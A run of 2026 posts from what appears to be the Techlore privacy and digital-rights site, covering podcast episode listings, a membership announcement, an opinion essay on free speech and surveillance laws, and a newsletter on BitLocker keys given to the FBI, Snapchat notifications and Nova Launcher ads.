2026-04-07T23:25:44.000Z Most password managers use your master password as the encryption key—which means it can be phished and brute-forced. Passbolt uses a random private key instead. Henry interviewed co-founder Remy about why they optimized Passbolt for teams, how granular permissions prevent credential leaks, and why self-hosting matters for businesses. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00 INTRO 01:20 PASSBOLT TARGET DEMOGRAPHIC 05:52 PASSWORD MANAGER BASICS 06:51 PASSBOLT TYPICAL CUSTOMER 07:41 PASSWORD MANAGER OPTIONS 10:33 ATTACKS ON BUSINESSES 13:17 PASSBOLT BUSINESS MODEL 16:24 SELF-HOSTING 19:22 PROPRIETARY TECHNOLOGY 22:09 SUITE VS. FOCUSED PRODUCT 24:12 FEATURE REQUESTS 25:49 EMAIL ALIASING 27:04 PASSKEYS 28:54 MANIFEST V3 + BROWSERS 30:26 PASSKEYS (CONT'D) 33:30 TOTP 36:49 INTEGRATIONS 37:59 TWO PASSWORDS? 42:09 REMY'S FAVORITE PW MANAGER 43:39 COMMON MISTAKES? 44:38 HIDING TOTP SEEDS 46:49 FINAL THOUGHTS 47:30 HOW TO FOLLOW 47:51 OUTRO #### Episode Sources - Passbolt: https://www.passbolt.com ### A New Chapter for Techlore: New Weekly Stream, Content Suggestions, Monero Memberships & More URL: https://techlore.tech/a-new-chapter-for-techlore-new-weekly-stream-content-suggestions-monero-memberships-more/ Last updated: 2026-04-12T02:01:09.000Z Hey everyone, Henry here 👋 This is one of those important, rare announcements that goes to your email inbox *(only 1-2x year as promised!)* I started Techlore over a decade ago because I believed people could make a real difference in their relationship with technology and push back against surveillance expansion. **Fast forward to 2026:** We reach hundreds of thousands of people monthly. We've covered everything from Chat Control votes to VPN bans to age verification mandates to the necessary resources required for you all to take better control of your technology. I firmly believe we've built one of the most approachable technology education resources on the internet. And here's what's changing now: **you get to directly influence what we cover, not just support from the sidelines.** ## What That Looks Like ### You Help Decide What We Create We're launching[ community content ideas](https://techlore.tech/community-content-ideas/). This is a living board where Techlorians submit what they want to see covered, and the public can keep track: [Community Content IdeasThis is where our community decides what content matters most. Techlorians (our members) submit ideas below that we add to the idea tracker below.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-42.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/photo-1590845947670-c009801ffa74-1)](https://techlore.tech/community-content-ideas/) We still have our own internal schedule, but this is the beginning of offering formal ways for you all to influence what we cover. **Why are submissions limited to members?** We reach hundreds of thousands monthly. Opening submissions to everyone would create an unmanageable flood. With this system, we can review every idea and maintain quality suggestions that shape our roadmap. Down the road, I'd like to open public voting. But...one thing at a time 😄 ### Weekly Stream To Answer Your Questions Since our [forum closure](https://techlore.tech/techlores-new-home-our-platform-transition-whats-next/), I've been brainstorming new formats for a new weekly livestream where I can be available for you. So I'm happy to announce our newest weekly stream: **Every Friday,** we're going live with the Techlore Office Hours Q&A. Submit questions about privacy, security, digital rights, or anything Techlore-related. Members get priority answers, but everyone can watch and participate! I encourage you to [submit questions in-advance](https://techlore.palform.app/ask) if you're unable to attend live, or are a Techlorian who wants priority. This week's stream is already scheduled, so make sure to set a reminder, and I'll see you soon: ### Better Platforms With More Privacy & Independence We're in the process of [sunsetting](https://www.patreon.com/posts/important-update-150608813) our Patreon on *December 31, 2026*—consolidating memberships to [Ghost](https://techlore.tech/#/portal). This allows us to: - **Enable private registrations.** Patreon tends to block alias emails and Privacy.com cards. Whereas Ghost allows users to register with better privacy. - **Finally support Monero memberships.** Pay with the most private cryptocurrency, with an additional 10% discount! You can become a Techlorian for 12 months at a time with Monero by [submitting the form here.](https://techlore.palform.app/monero) - **Have Better independence.** Tying to the previous point, this allows us to be more independent and avoid weird shenanigans like how Apple is [demanding](https://techcrunch.com/2026/01/28/apple-tells-patreon-to-move-creators-to-in-app-purchase-for-subscriptions-by-november/) an additional cut from Patreon subscriptions. - **And Easier Maintenance.** We are only a team of two, centralizing to one platform makes delivering perks consistently much simpler to accomplish. And with less fees too! ### Announcing Our Newest Perks While we publish our resources entirely free for the world, many people still want more individualized help. In the past, we offered one-on-one coaching to try and offer this to people, but it was challenging to maintain at scale. So taking what we learned, we're formalizing new offerings as part of our [membership](https://techlore.tech/#/portal) tiers: - **Exclusive Signal community & my personally curated digital rights RSS Feed** (Bronze+ | Real-time discussions with other Techlorians. And yes, direct access to the exact curated RSS feed I update daily to keep track of what's happening, so you don't have to) - **Re-introducing your name in video credits and shout-outs** (Silver+ and Gold+) - **Monthly private calls with me + exclusive behind the scene updates** (Diamond | Strategy, advice, deep-dive discussions) ## Why All Of This Matters Every week, we cover new threats: encryption backdoors, age verification expansion, VPN bans, browser extension schemes. It's easy to feel powerless against governments and corporations with infinite resources. But here's what I've learned in 10 years: **we all can seriously make an impact!** When thousands of people understand what Chat Control actually does, they contact their MEPs. When people know age verification is surveillance infrastructure, they push back locally. When our community shares educational content with family who "don't care about privacy," we expand the movement. My goal is for Techlore to not just be a YouTube channel. I want us to help build the movement that's proving individuals can fight **(and win!)** ![](https://media.tenor.com/Dud8CEuUZ2oAAAAC/theincredibles-yes.gif) ## What's Next We've offered perks we didn't deliver consistently. We've spread ourselves thin across too many platforms. We've fallen behind on larger projects. So we made hard choices the last several months: we closed the public forum (it needed dedicated employees, not part-time attention), we consolidated platforms (Ghost instead of multiple support platforms), and are building the systems we can actually maintain with a two-person team. While this isn't the community we had. This is the community we can sustain and grow for the next decade. **If you're already supporting us:** Thank you. Seriously. You've made everything we do possible. Don't forget to access your perks at [techlore.tech/techlorian](https://techlore.tech/techlorian) and claim them. *(Patreon members: You're grandfathered through Dec 31, 2026\. Details* [*here*](https://www.patreon.com/posts/important-update-150608813)*)* **If you've been thinking about supporting:** There hasn't been a better time, especially now you can [even do it with Monero](https://techlore.palform.app/monero)! **If you can't support financially:** That's completely fine! Just keeping yourself educated & sharing with people what's going on is still the most important thing we all can do. I'm excited to see you all for our weekly Office Hours and our other content! All of these changes will continue to make our standard content better + more polished + more consistent too 🫡 The fight isn't slowing down, and neither are we. Thank you all for your support, and I'll see you in our stream tomorrow, and our next digital rights newsletter. — Henry & Team --- - **Join the community:** - **Vote on what we cover:** [https://techlore.tech/community-content-ideas](https://techlore.tech/community-content-ideas/) - **Submit Office Hours questions:** - **Access all your perks:** [techlore.tech/techlorian](https://techlore.tech/techlorian) #### On this page ### The Free Speech Grift: How Politicians Tricked You Into Demanding Surveillance URL: https://techlore.tech/the-free-speech-grift-how-politicians-tricked-you-into-demanding-surveillance/ Last updated: 2026-04-12T02:00:31.000Z It's happening everywhere: Politicians screaming "big tech censorship" and "free speech" while simultaneously crafting legislation that gives governments unprecedented control over what you do online. They attack moderation, while pushing laws that would require platforms to verify your identity, scan your messages, and report you to authorities. This is because the goal was never about protecting speech, it was controlling it. And they're counting on you to not connect the dots. ![a typewriter with a paper that reads freedom of speech](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/02/photo-1653469894117-2c0fa4abb7f4.jpeg) Photo by [Markus Winkler](https://unsplash.com/@markuswinkler) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) ## The Setup: Weaponizing "Free Speech" I'm a proud free speech supporter. So let me clear up the biggest misconception I see online: Free speech means the *government* can't prosecute you for what you say (with exceptions like threats or incitement). It was a revolutionary idea—criticize the king without losing your head, dissent without state violence. But it has never meant private platforms must host your content, amplify your views, or give you a microphone. The reality is you **don't** have a constitutional right to a Twitter account any more than you have a constitutional right to sit at a restaurant that kicked you out for screaming at staff. And we saw this debate play out recently with the Supreme Court's decision in [*Free Speech Coalition v. Paxton*](https://www.supremecourt.gov/opinions/24pdf/23-1122%5F3e04.pdf). By upholding Texas’s right to demand ID for adult content, the court signaled that 'modest' surveillance is an acceptable price for speech. So politicians aren't just screaming at the restaurant manager, they’ve convinced the courts to let them station a guard who demands your papers before you can look at the menu. This is all part of the grift. Millions have fallen for this idea that "free speech" is synonymous with "I should be able to say whatever I want on any platform without consequences." And this serves a distinct purpose: **it positions platforms as the enemy and government intervention as the solution.** ![a close up of a cell phone with social icons on it](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/02/photo-1710870509663-16f20f75d758.jpeg) Photo by [Ralph Olazo](https://unsplash.com/@ralpholazo) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) ## The Bait: Section 230 and the Platform Panic Enter Section 230 of the Communications Decency Act, one of the most important laws protecting internet freedom. Section 230 says two critical things: 1. Platforms aren't liable for user-generated content (you can't sue YouTube because someone uploaded a defamatory video) 2. Platforms can moderate content in good faith without losing that protection (removing spam doesn't make you a publisher) Without Section 230, platforms would either have to manually approve every post (impossible at scale) or host nothing to avoid liability. While imperfect, it enables the messy, chaotic, innovative internet we have. But lately, Section 230 has been attacked from all angles. Politicians from both parties blamed it for everything from "big tech censorship" to "misinformation" to "harmful content." The proposed solution? Gut Section 230. The ['Sunset Section 230'](https://www.congress.gov/bill/119th-congress/senate-bill/3546) bills make this explicit. By threatening to let the law expire entirely, lawmakers are holding a gun to the head of the internet. They know that no company will risk a billion-dollar, class-action lawsuit because a user posted something spicy. This is a forced retreat into a sanitized, corporate-approved version of the web where only 'safe' (read: ***government-compliant***) speech is allowed. Notice what's missing from all these debates? **Your rights. Your privacy. Your actual freedom.** ![black and white rectangular frame](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/02/photo-1590856029826-c7a73142bbf1.jpeg) Photo by [Tobias Tullius](https://unsplash.com/@tobiastu) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) ## The Switch: From Platform Rights to Government Control This is where the deception crystalizes in what almost sounds like hypocrisy. The same politicians screaming about "free speech" and "government overreach" are also the same ones pushing: - **Age Verification**: [Over half of US states](https://action.freespeechcoalition.com/age-verification-bills/) have passed or are pushing age verification laws. Some are even pushing to age-verify entire app stores—meaning you might soon have to upload a government ID to the cloud just to download a calculator or a weather app. This: - Creates a comprehensive database of what you read, watch, and browse - Normalizes government ID requirements for internet access - Massive privacy violations and identity theft risks - Creates the precedent for deciding who gets access to what content (as deemed by the government) - **Message Scanning Mandates**: The EU's Chat Control proposal would require platforms to scan your private messages for illegal content. The UK's Online Safety Bill includes similar provisions. This means: - End-to-end encryption becomes illegal or useless - Your private conversations are screened by AI - Governments decide what content triggers reporting - The infrastructure for mass surveillance is built permanently **The pattern is quite clear:** Use "free speech" and "moderation" rhetoric to demand government control over platforms, then use that control to mandate surveillance, verification, and content restrictions that is reminiscent of 1984 with better UX and a subscription. If this were actually about protecting children + adults, we'd see comprehensive data privacy laws, mandatory security standards, and actual consequences for platforms that exploit people for engagement. Instead, we get a national ID checkpoint for the internet, while refusing to deal with any systemic problems that got us here in the first place. ![black and white labeled bottle](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/02/photo-1629753908080-e8551ac57b8d.jpeg) Photo by [Markus Spiske](https://unsplash.com/@markusspiske) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) ## What They're Ignoring: Actual Rights For Citizens While politicians push age verification and message scanning, they're silent on regulations that would actually help users: - **Transparency Requirements**: Platforms should disclose their moderation criteria, algorithm mechanics, and data collection practices. - **Data Privacy Minimization**: Platforms should be required to collect only necessary data, delete it when no longer needed, and give users actual control over their information. - **Security Baselines**: Platforms should meet minimum security standards to protect user data from breaches. - **Interoperability Rights**: Users should be able to communicate across platforms without lock-in. - **Algorithmic Transparency and Choice**: Users should understand how algorithms rank and recommend content, and have alternatives. - **More User Control:** Users should have the legal right to use platforms in ways that guarantee more control for both themselves and their families. Rather than having the government decide what is and isn't safe for children to access online, more tools should be available for parents to help choose what they want their own children to access. *(yes, this is a radical idea called making parents parent their own children—not the government)* Notice what all these have in common? They empower *users* rather than governments. They increase *freedom* rather than control. ![](https://media.tenor.com/nWraCgWSeWAAAAAC/clueless-amber.gif) ## What Platforms Should Be Allowed to Do Here's what I think will make both sides angry: I think platforms should *generally* be allowed to moderate however they want. Not because moderation is always good, but because the alternative, government-mandated speech rules, is catastrophically worse. We’ve reached a point where everyone wants to use the State as their personal content manager. - **The Left** is persistently angry that platforms don't do *more* to moderate - **The Right** is persistently angry that platforms have rules at all In my opinion, if a platform wants to be a free-for-all with minimal moderation, users can choose to use it. Alternatively, if a platform wants strict community guidelines, users can choose that instead. On our forum, we opted for the latter; we took moderation quite seriously and took immediate action if someone wasn't following our rules. But I believe if someone else hosted a forum with almost no rules—they should have the right to do that! (obviously barring illegal content!) The question to ask is: who gets to decide which trade-offs you have to accept when you register for a service? You, or a politician who’s never used the platform? If we want to fix big tech we need to build alternatives and create an ecosystem that allows others to compete. We need to support decentralization. Enable interoperability. Make it so easy to switch providers that platforms have to actually compete for your time and attention instead of lobbying for greater control over your life. ## The Path Forward: Demand Actual Rights The moderation deception only works if we accept the framing. Real regulation, the kind that actually helps users, would look nothing like what's being proposed. It would: - Protect user privacy and security - Require transparency without mandating outcomes - Enable competition and interoperability - Empower users with real choice and control - Apply universally without picking winners Bad regulation, the kind being pushed, does the opposite. It mandates surveillance, restricts alternatives, empowers governments, and eliminates user choice. The question isn't whether platforms should be regulated. The question is *who* regulation serves: users seeking freedom and privacy, or governments seeking control and surveillance. The grifters are counting on you not connecting the dots. They're betting you'll accept surveillance as long as it's wrapped in 'safety' rhetoric. Don't fall for it. #### On this page ### Why Privacy Isn't What I Thought It Was URL: https://techlore.tech/why-privacy-isnt-what-i-thought-it-was/ Last updated: 2026-02-25T18:38:57.000Z After 10+ years covering privacy tools, I finally understand the role privacy plays in my life, and it's not what I thought. This realization changed how I think about digital rights, threat modeling, and what we're all really fighting for. If you've ever felt like you're chasing privacy for the sake of privacy, this one's for you. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Why Everyone Should Use an Ad Blocker (AdGuard Interview) URL: https://techlore.tech/why-everyone-should-use-an-ad-blocker-adguard-interview/ Last updated: 2026-04-07T23:25:32.000Z Ad blockers have broad permissions to intercept all your web traffic—which means you need to know which ones to trust. Henry interviewed the CTO and co-founded of AdGuard about why they pivoted from data collection to privacy protection, how DNS filtering differs from local ad blocking, and Apple's revolutionary new API that lets ad blockers work system-wide on iOS without ever seeing your traffic. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:06:04 PRE-SNOWDEN VS. POST-SNOWDEN 00:07:58 TYPES OF FILTERING 00:15:03 LOCAL FILTERING VS. DNS & VPN 00:18:14 INTERCEPTING WEB TRAFFIC CONCERNS 00:21:27 ADGUARD VS. BROWSER SOLUTIONS 00:26:15 ADGUARD EXTENSION VS. OTHERS 00:31:15 ADGUARD FILTERING VS. OTHERS 00:32:04 ADGUARD HOME 00:34:08 PRICING STRUCTURE 00:35:52 BASED IN CYPRUS? 00:38:25 OPEN SOURCE? 00:41:04 THE AD BLOCKING ECOSYSTEM 00:44:26 MITIGATING ATTACKS 00:51:13 THE ROLE OF AD BLOCKING 00:54:37 APPLE'S NEW API 00:57:38 COMPARISON TO DNS FILTERING 00:58:56 ETA FOR THESE UPDATES 00:59:43 APPLE'S PATTERN 01:00:58 BLOCKING APPLE DOMAINS 01:02:28 WRAPPING UP #### Episode Sources • AdGuard: https://adguard.com/ • AdGuard Home: https://adguard.com/en/adguard-home/overview.html • AdGuard DNS: https://adguard-dns.io/ • AdGuard VPN: https://adguard-vpn.com/ • AdGuard Mail: https://adguard-mail.com/ • Andrey's AFDS 2025 Talk: https://www.youtube.com/watch?v=L2c5WMjpVZc ### FBI Admits Defeat: iPhone Security Actually Works — And A New iOS Cellular Security Feature URL: https://techlore.tech/fbi-admits-defeat-iphone-security-actually-works-and-a-new-ios-cellular-security-feature/ Last updated: 2026-04-07T23:21:43.000Z This week's Surveillance Report covers Apple's security features actually stopping the FBI from accessing a journalist's iPhone, a global wave of age verification hitting Austria, Spain, and Greece, Chat Control 1.0's extension after the Commission admits negotiations failed, Microsoft backing away from Recall as AI fatigue grows, and more! 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 INTRO 00:40 HIGHLIGHT STORY: APPLE LOCKDOWN MODE 08:05 AGE VERIFICATION EXPANDING TO 3 COUNTRIES 12:38 CHAT CONTROL 1.0 EXTENSION 17:54 MICROSOFT ADMITS THEIR AI IS BAD 22:56 THE DEFENSE BULLETIN #### Episode Sources ****Highlight: Apple's Security Feature Just Stopped the FBI** - - - ****Story 1: Age Verification Wave Hits 3 Countries in One Week** - - - ****Story 2: Chat Control 1.0 Extension** - - - - ****Story 3: Microsoft Backs Away From Recall—AI Fatigue Sets In** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - - - - - - ### Politicians Finally Care About Data Brokers (Because Now They're Victims) URL: https://techlore.tech/politicians-finally-care-about-data-brokers-because-now-theyre-victims/ Last updated: 2026-02-25T18:33:25.000Z A Minnesota state representative was assassinated after someone found her home address on people search websites. A new report reveals that even state privacy laws fail to protect public servants from data brokers. But here's the bigger problem: this affects everyone, not just politicians. I'll break down why current solutions are reactive, show you how to actually prevent this data from being collected in the first place, and explain what systemic changes we need to push for. Links to data removal tools, opt-out resources, and action steps are below. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How Peer-to-Peer Apps Stay Free Forever (Holepunch Interview) URL: https://techlore.tech/how-peer-to-peer-apps-stay-free-forever-holepunch-interview/ Last updated: 2026-04-09T18:46:03.000Z Peer-to-peer networks have no servers—just devices talking directly to each other. Henry interviewed Mathias Buus Madsen, CEO of Holepunch, about how BitTorrent handled 40 million users without servers, why their messenger Keet can't go down even when usage spikes, their new P2P password manager, and how P2P apps are more energy efficient than data centers. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.acast.com/public/shows/665039d6f749480012b06ac1). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) #### Episode Timestamps 00:00:00 INTRO 00:01:25 WHAT IS PEER-TO-PEER (P2P)? 00:03:16 BENEFITS OF P2P 00:05:38 GETTING STARTED IN P2P 00:08:43 NEGATIVE P2P ASSOCIATIONS 00:14:13 P2P CENSORSHIP RESISTANCE 00:17:14 P2P SAFETY 00:21:29 KEET (P2P MESSENGER) 00:26:21 OPEN SOURCE? 00:27:12 BEING SERVERLESS 00:31:04 OPEN SOURCE VS. CLOSED SOURCE 00:34:05 ARE UPDATES P2P? 00:34:33 IS THERE AN APK? 00:35:37 BACKGROUND SYNC 00:39:27 WHAT ELSE DOES HOLEPUNCH WORK ON? 00:42:04 MORE INFO ON THE STACK 00:45:00 FUNDING + TETHER 00:48:09 P2P PASSWORD MANAGER? 00:54:48 AUDITS 00:55:57 AVAILABLE ON LINUX? 00:58:33 CENTRALIZED/HYBRID P2P? 01:01:49 P2P DOWNSIDES? 01:05:01 APPLE FINDMY NETWORK 01:07:16 ENVIRONMENTAL IMPACT 01:11:48 SERVICE DOWNTIME 01:12:52 HOW TO FOLLOW 01:13:59 OUTRO #### Episode Sources • Holepunch: https://holepunch.to/ • Keet Messenger: https://keet.io • Pears: https://pears.com • Pear Pass: https://pass.pears.com ### I Ranked Every Major Linux Distro (By Skill Level) URL: https://techlore.tech/i-ranked-every-major-linux-distro-by-skill-level/ Last updated: 2026-01-30T23:24:18.000Z Many Linux tier lists rank distros best to worst, but that makes things difficult when Qubes is great for security and not great for beginners. In this 2026 tier list, I'm ranking distros by where they fit in YOUR Linux journey: first distro, level up, or advanced/specialized. Enjoy the ranking and hope you learn something too along the way! Thanks to Chris Titus Tech for maintaining the list and making this so accessible to everyone! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Microsoft Gave FBI Your Encryption Keys URL: https://techlore.tech/microsoft-gave-fbi-your-encryption-keys/ Last updated: 2026-04-07T23:21:30.000Z This week's Surveillance Report covers Microsoft handing BitLocker encryption keys to the FBI, meaning your "encrypted" Windows data isn't as secure as you thought. This two-week Surveillance Report covers age verification laws spreading across three continents, 840,000 malicious browser extension installs, WhatsApp's encryption challenged in court, a trusted Android launcher turned spyware, and how social media platforms engineer addiction by design. Plus major breaches, and essential security updates you need to know about. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.acast.com/public/shows/65e15188b8456c00169f4864). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### Episode Timestamps 00:00 SURVEILLANCE REPORT INTRO 00:53 HIGHLIGHT STORY: BITLOCKER ENCRYPTION 09:36 MORE GLOBAL AGE VERIFICATION 14:24 DANGEROUS BROWSER EXTENSIONS 19:44 WHATSAPP ACCUSED OF NO ENCRYPTION 26:20 PROMO SEGMENT! 28:10 NOVA LAUNCHER SELLS OUT 31:50 SOCIAL MEDIA PLATFORMS CAUGHT BEING ADDICTIVE 37:38 THE DEFENSE BULLETIN #### Episode Sources ****Highlight: Microsoft Handed BitLocker Encryption Keys to FBI** - - - - - ****Age Verification Tsunami Hits Three Continents** - - - - - - ****Malicious Browser Extensions Installed 840,000 Times** - - - ****WhatsApp's End-to-End Encryption Challenged in Lawsuit** - - ****Popular Android Launcher Sold, Now Spies on 9 Million Users** - - ****Social Media Addiction by Design** - - ****The Defense Bulletin** - - - - - - - - - - - - - - - - - - - - - - ### WhatsApp Sued Over Fake Encryption Claims URL: https://techlore.tech/whatsapp-sued-over-fake-encryption-claims/ Last updated: 2026-01-28T02:51:53.000Z WhatsApp just got sued for allegedly lying about end-to-end encryption, with claims that Meta employees can access any user's messages through a simple internal request. While the lawsuit provides no technical proof, we'll show you the confirmed privacy issues with WhatsApp and explain why closed-source encryption is fundamentally untrustworthy. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Microsoft Hands Your Encryption Keys to the FBI | Jan 19-26 URL: https://techlore.tech/microsoft-hands-your-encryption-keys-to-the-fbi/ Last updated: 2026-01-27T03:10:28.000Z ## On Our Radar 🎯 **Microsoft Is Handing Your Encryption Keys to the Government** For years, privacy advocates warned about centralized encryption key storage. This latest news speaks to why: Microsoft [confirmed](https://techcrunch.com/2026/01/23/microsoft-gave-fbi-a-set-of-bitlocker-encryption-keys-to-unlock-suspects-laptops-reports/) it provides BitLocker recovery keys to law enforcement with valid warrants, roughly 20 times a year. BitLocker is the encryption software built into modern Windows PCs that scrambles your hard drive data. It works well, except for one architectural flaw: Microsoft recommends users store recovery keys on its servers "for convenience." This means if you forget your password or get locked out, you can recover your data. We now also know this means the FBI can subpoena those keys. In a Guam fraud investigation, federal agents served Microsoft with a warrant for BitLocker keys from three laptops. Microsoft complied. The FBI unlocked the devices and accessed everything on them. One could argue this is literally a front door Microsoft built and left wide open. The technical solution exists. Cryptography experts point to hardware-based recovery keys (like storing your key on a USB drive) or encrypted cloud backups where the company can't access the key. Microsoft offers the USB option, but it's not the default. The default is "upload your key to our servers where we can give it to anyone with a warrant." [VeraCrypt](https://privacytools.techlore.tech/#encryption)—a free, open-source encryption tool—simply doesn't have this problem. It encrypts your disk locally, you control the keys, and there's no cloud backup option to compromise. Yet [Ars Technica's guide](https://arstechnica.com/gadgets/2026/01/how-to-encrypt-your-pcs-disk-without-giving-the-keys-to-microsoft/) on "How to encrypt your PC without giving keys to Microsoft" suggests upgrading to Windows 11 Pro ($99) to get more BitLocker control. I wish they mentioned VeraCrypt, which costs $0 and gives you far greater control. **What you can do:** If you're using BitLocker, check if your recovery key is stored with Microsoft (Settings > Privacy & Security > Device Encryption) If it is, back it up locally and delete it from your Microsoft account. Better yet, consider VeraCrypt for full disk encryption you actually control, especially for sensitive data. If you're on macOS, Filevault is an excellent native option that you can choose to use without iCloud quite easily. And Linux users should utilize LUKS for their disk encryption. --- ## Bits & Bytes 🤖 **\~** [**Snapchat's Fake Notifications Violate EU Law**](https://edri.org/our-work/new-research-reveals-how-snapchat-uses-notifications-to-manipulate-users/) New research exposed how Snapchat manipulates users with misleading notifications. The study monitored notifications for six weeks and found Snapchat sends fake friend requests (they're actually suggestions), false time-sensitive alerts, and recapture notifications designed to pull you back to the app. The most notifications appeared when researchers *didn't* open the app—the platform desperately trying to recapture attention. Users interviewed thought they were receiving personal messages when it was recommended content. They couldn't turn off in-app badges (those red dots). Some disabled all notifications entirely just to escape the manipulation. **Our take:** As the EDRi mentions, this likely violates the EU's Digital Services Act Article 25 on manipulative design. Bits of Freedom is contacting Dutch regulators to force compliance. The study recommends notifications should be disabled by default and users should control categories. Platforms compete for attention because they profit from time-on-app—your mental bandwidth is their business model. This is just one of many manipulative patterns utilized by big tech companies to capture your most valuable asset: your attention. Hopefully this story is a reminder to double-check all apps on your phone and the influences they have on your attention. **\~** [**F-Droid Basic 2.0 Brings Modern Design to Privacy App Store**](https://alternativeto.net/news/2026/1/f-droid-basic-2-0-alpha-debuts-with-rewritten-ui-better-search-and-improved-app-discovery/) F-Droid released the first alpha of its 2.0 app after a year-long redesign. Built from scratch with Kotlin Compose, it features improved search (now searches descriptions and translations), highlights most-downloaded apps for discovery, and adds Material You theming. Installation workflows improved, downloads require approval first, multiple updates can run in parallel, and the app alerts you to signing key changes (critical for security). Some features are still missing (IPFS support, screenshot prevention, installation history) and there are minor bugs, but it should be stable enough for daily testing. **Our take:** This matters because F-Droid is the primary alternative app store for privacy-focused Android users. While Google Play tracks everything and Apple's App Store is a walled garden, F-Droid distributes open-source apps without surveillance. A modern UI removes friction for newcomers. Privacy tools shouldn't require tolerating 2015-era interfaces, and F-Droid modernizing will make life better for everyone trying to escape big tech! **\~** [**Nova Launcher's New Owner Plans Ads**](https://www.theverge.com/news/864585/nova-launcher-instabridge-acquisition-owner-ads) Instabridge acquired Nova Launcher and immediately started "evaluating ad-based options" for the free version. Users already report seeing ads, and code analysis found Facebook Ads and Google AdMob trackers in the latest update. The paid version (Nova Launcher Prime) will supposedly remain ad-free. This follows drama where original developer Kevin Barry left after Branch Metrics laid off the team and stopped his open-sourcing effort. Branch promised to open-source Nova if Barry left—they didn't. Barry says he already did the prep work (cleaned code, stripped API keys, got legal approval) but the decision now rests with Instabridge. **Our take:** Another trusted Android tool degraded by acquisition, quite similar to Simple Tools. The difference? Simple Tools was open source and within weeks we got a new open source clone, Fossify. Sadly, Nova Launcher didn't have this option as it never reached full open source status. Now you'll see ads unless you pay, and the open-source promise remains broken. The pattern repeats: indie developer builds something users love, sells to company that "evaluates monetization options," community loses trust. Using tools like F-Droid are a great protection against this, as they only allow free and open source software, regardless of acquisitions. --- ## This Week on Techlore 📺 It's been a lighter week as we're navigating some transitions. Thank you all for your patience, we'll have an extra juicy Surveillance Report this week since we missed last weeks. On Techlore Talks, we had Evgency from SimpleX come on to discuss the messenger and the overall network: [The Messaging App With No User IDs (SimpleX Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-39.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260121-SIMPLEX-INTERVIEW-thumbnail-henry.jpg)](https://techlore.tech/the-messaging-app-with-no-user-ids-simplex-interview/) We also did some coverage for new age verification proposals being pushing in the UK and in the US state of Florida: [Age Verification Goes Global: UK, Florida, and the Surveillance FutureThe UK is following Australia’s social media ban for kids, but Florida just took it to another level with TWO separate bills targeting app stores AND AI chatbots. These laws would require age verification for nearly every app, 